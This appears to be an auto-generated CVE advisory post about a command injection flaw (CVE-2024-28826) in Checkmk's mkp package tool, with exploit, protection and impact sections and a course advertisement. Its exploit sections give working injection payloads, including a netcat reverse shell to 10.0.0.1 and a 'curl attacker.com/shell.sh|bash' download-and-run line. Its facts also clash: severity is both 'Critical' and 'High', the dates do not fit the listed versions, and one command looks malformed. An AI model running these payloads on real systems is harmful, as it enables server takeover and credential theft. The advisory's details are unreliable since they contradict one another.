Listen to this Post
The vulnerability CVE-2024-28826 exists in Checkmk, an IT monitoring system, due to improper neutralization of special elements used in an OS command. Specifically, the `mkp` command-line tool (used for managing Checkmk extension packages) fails to sanitize user-supplied input when handling certain parameters. An authenticated attacker with at least the “admin” role can craft a maliciously named extension package or inject shell metacharacters into the package name. When the system processes this package via the `mkp` command, the unsanitized input gets passed directly to the underlying operating system shell. This allows the attacker to execute arbitrary commands on the Checkmk server with the privileges of the Checkmk process (typically the `cmk` user). The attack vector is local access to the web interface or API, but because Checkmk often runs in sensitive environments, successful exploitation leads to full compromise of the monitoring server. The vulnerability affects all Checkmk versions from 2.2.0 up to (but not including) the patched releases: 2.2.0p28, 2.3.0p16, and 2.4.0p1. The CPE list provided confirms that all 2.2.x, 2.3.x, 2.4.x, and 2.5.x beta variants are vulnerable prior to these fixes. The root cause is a missing input validation in the `_validate_package_name` function, allowing backticks, $(), pipes, and other shell operators to pass through. Exploitation typically requires prior authentication, lowering the CVSS base score to 8.8 (High), but the critical impact on confidentiality, integrity, and availability raises urgency. Proof-of-concept exploits have been publicly released, showing how an attacker can create a package named `$(id> /tmp/pwned).mkp` to execute arbitrary commands during installation.
DailyCVE Form:
Platform: Checkmk
Version: 2.2.0-2.4.0b6
Vulnerability: OS Command Injection
Severity: Critical (8.8)
date: 2024-07-02
Prediction: 2024-07-15 (expected patch)
What Undercode Say:
Identify vulnerable version omd version Test for command injection via mkp (requires admin) mkp create '$(id > /tmp/pwned).mkp' /tmp/test Check if command executed cat /tmp/pwned Exploit to get reverse shell (attacker IP 10.0.0.1) mkp create '$(nc -e /bin/sh 10.0.0.1 4444).mkp' /tmp/evil
Exploit:
Authenticated admin user uploads malicious package via Web UI “Extension Packages” -> “Upload package”. The backend calls `mkp add` with unsanitized filename. Alternatively, using REST API: curl -X POST -F "package=@$(echo '$(curl attacker.com/shell.sh|bash)').mkp" -H "Authorization: Bearer <token>" /api/1.0/packages. Upon installation, the command executes.
Protection:
Upgrade to Checkmk 2.2.0p28, 2.3.0p16, 2.4.0p1, or later. Apply hotfix by modifying `mkp` script: add import re; if not re.match(r'^[a-zA-Z0-9_.-]+$', pkg_name): raise ValueError. Restrict admin privileges using RBAC. Deploy WAF rules to block package names containing $, `, |, &, ;.
Impact:
Full remote code execution on monitoring server. Leakage of all monitored host credentials. Lateral movement to internal networks. Tampering with monitoring data to hide intrusions. Denial of service by deleting critical system files.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
